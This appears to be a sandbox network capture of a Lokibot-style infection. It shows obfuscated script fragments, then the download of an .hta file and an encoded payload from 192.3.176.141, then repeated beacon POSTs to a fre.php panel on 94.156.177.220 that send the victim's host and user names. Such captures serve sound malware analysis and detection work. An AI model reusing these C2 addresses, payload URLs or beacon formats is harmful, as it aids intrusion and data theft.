Oct 24, 2024 08:45:34.428091049 CEST	1236	IN	Data Raw: 00 27 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e 00 20 00 69 00 73 00 20 00 6f 00 6e 00 6c 00 79 00 20 00 76 00 61 00 6c 00 69 00 64 00 20 00 77 00 68 00 65 00 6e 00 20 00 75 00 73 00 65 00 64 00 20 00 77 00 69 00 74 00 68 00 20 00 74 00 68 00 65 Data Ascii: ' option is only valid when used with the '-remote' option" apoucadoFlags = apoucadoFlags OR wsman.SessionFlagUs
Oct 24, 2024 08:45:34.428106070 CEST	636	IN	Data Raw: 00 45 00 52 00 4e 00 41 00 4d 00 45 00 29 00 2c 00 20 00 22 00 54 00 68 00 65 00 20 00 27 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45 00 52 00 4e 00 41 00 4d 00 45 00 20 00 26 00 20 00 22 00 27 00 20 00 6f Data Ascii: ERNAME), "The '-" & NPARA_USERNAME & "' option is not valid for '-auth:none'" ASSERTBOOL not optDic.Argu
Oct 24, 2024 08:45:34.428121090 CEST	1236	IN	Data Raw: 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45 00 52 00 4e 00 41 00 4d Data Ascii: TBOOL optDic.ArgumentExists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option must be specified for '-auth:basic'"
Oct 24, 2024 08:45:34.428138018 CEST	212	IN	Data Raw: 00 20 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 43 00 45 00 52 00 54 00 29 00 2c 00 20 00 22 Data Ascii: not optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid for '-auth:digest'"
Oct 24, 2024 08:45:34.428152084 CEST	1236	IN	Data Raw: 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 61 00 70 00 6f 00 75 00 63 00 61 00 64 00 6f 00 46 00 6c 00 61 00 67 00 73 00 20 00 3d 00 20 00 61 00 70 00 6f 00 75 00 63 00 61 00 64 Data Ascii: apoucadoFlags = apoucadoFlags OR wsman.SessionFlagCredUsernamePassword OR wsman.SessionFlagUseDigest
Oct 24, 2024 08:45:34.428169966 CEST	1236	IN	Data Raw: 00 6f 00 74 00 20 00 76 00 61 00 6c 00 69 00 64 00 20 00 66 00 6f 00 72 00 20 00 27 00 2d 00 61 00 75 00 74 00 68 00 3a 00 6e 00 65 00 67 00 6f 00 74 00 69 00 61 00 74 00 65 00 27 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 Data Ascii: ot valid for '-auth:negotiate'" apoucadoFlags = apoucadoFlags OR wsman.SessionFlagUseNegotiate
Oct 24, 2024 08:45:34.433525085 CEST	1236	IN	Data Raw: 00 5f 00 50 00 41 00 53 00 53 00 57 00 4f 00 52 00 44 00 20 00 26 00 20 00 22 00 27 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e 00 20 00 69 00 73 00 20 00 6e 00 6f 00 74 00 20 00 76 00 61 00 6c 00 69 00 64 00 20 00 66 00 6f 00 72 00 20 00 27 00 2d Data Ascii: _PASSWORD & "' option is not valid for '-auth:certificate'" apoucadoFlags = apoucadoFlags OR wsman.Sessi

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 08:45:46.018553019 CEST	487	OUT	GET /36/bv/seethebestthingstobegoodwithhislifebestthigns.hta HTTP/1.1 Accept: / Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) If-Modified-Since: Thu, 24 Oct 2024 00:44:54 GMT Connection: Keep-Alive Host: 192.3.176.141 If-None-Match: "20a04-6252e4f9e216e"
Oct 24, 2024 08:45:46.719068050 CEST	275	IN	HTTP/1.1 304 Not Modified Date: Thu, 24 Oct 2024 06:45:45 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 24 Oct 2024 00:44:54 GMT ETag: "20a04-6252e4f9e216e" Accept-Ranges: bytes Keep-Alive: timeout=5, max=100 Connection: Keep-Alive

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 08:46:03.232137918 CEST	81	OUT	GET /36/LOGS%20LOKI.txt HTTP/1.1 Host: 192.3.176.141 Connection: Keep-Alive
Oct 24, 2024 08:46:03.924801111 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 06:46:02 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 24 Oct 2024 00:22:01 GMT ETag: "22aac-6252dfdc859ae" Accept-Ranges: bytes Content-Length: 141996 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED] Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 24, 2024 08:46:03.924824953 CEST	224	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 24, 2024 08:46:03.924844027 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 24, 2024 08:46:03.924851894 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 24, 2024 08:46:03.924861908 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 24, 2024 08:46:03.924875975 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 24, 2024 08:46:03.924881935 CEST	848	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 24, 2024 08:46:03.925067902 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 24, 2024 08:46:03.925122976 CEST	212	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 24, 2024 08:46:03.925159931 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 24, 2024 08:46:03.930320978 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 08:46:07.495675087 CEST	244	OUT	POST /logs/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F0B98DE8 Content-Length: 176 Connection: close
Oct 24, 2024 08:46:07.501003027 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.ruAlbus040965ALBUS-PCk0DE4229FCF97F5879F50F8FD31bcqt
Oct 24, 2024 08:46:08.436815977 CEST	228	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 06:46:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 15 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 08:46:08.597771883 CEST	244	OUT	POST /logs/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F0B98DE8 Content-Length: 176 Connection: close
Oct 24, 2024 08:46:08.603128910 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.ruAlbus040965ALBUS-PC+0DE4229FCF97F5879F50F8FD3tcetK
Oct 24, 2024 08:46:09.532896042 CEST	228	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 06:46:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 15 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.